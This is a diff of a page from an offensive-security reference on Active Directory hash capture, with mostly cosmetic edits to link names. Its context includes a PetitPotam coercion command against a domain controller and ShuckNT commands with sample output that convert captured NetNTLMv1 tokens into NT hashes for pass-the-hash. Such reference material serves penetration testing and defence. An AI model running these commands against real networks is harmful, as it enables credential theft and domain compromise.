swisskyrepo/InternalAllTheThings/docs/active-directory/hash-capture.md

     PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users
     ```

+## Cracking Net-NTLMv1/NTLMv1 hashes

-* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [Shuck.Sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords).
+* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [shuck.sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords).
 If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](./hash-pass-the-hash.md) ready) instantly.
-The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ&ab_channel=PasswordVillage) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked).
+The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked).

     ```ps1
     # Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php
     # Or shuck them on-premise via ShuckNT script:
     $ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin

     [...]
     10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free.
     [INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788
     [NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B
     ```

-* If you got some `NetNTLMv1 tokens`, you can also try to crack them via [Crack.Sh](https://crack.sh/) (cloud service when available, more time and potentially chargeable).
-For this you need to format them to submit them on [Crack.Sh](https://crack.sh/netntlm/).
-The Converter of [Shuck.Sh](https://shuck.sh/) can be used to convert format easily.
+* If you got some `NetNTLMv1 tokens`, you can also try to crack them via [crack.sh](https://crack.sh/) (cloud service when available, more time and potentially chargeable).
+For this you need to format them to submit them on [crack.sh](https://crack.sh/netntlm/).
+The converter of [shuck.sh](https://shuck.sh/) can be used to format easily.

     ```ps1
     # When there is no-ESS/SSP and the challenge is set to 1122334455667788, it's free (0$):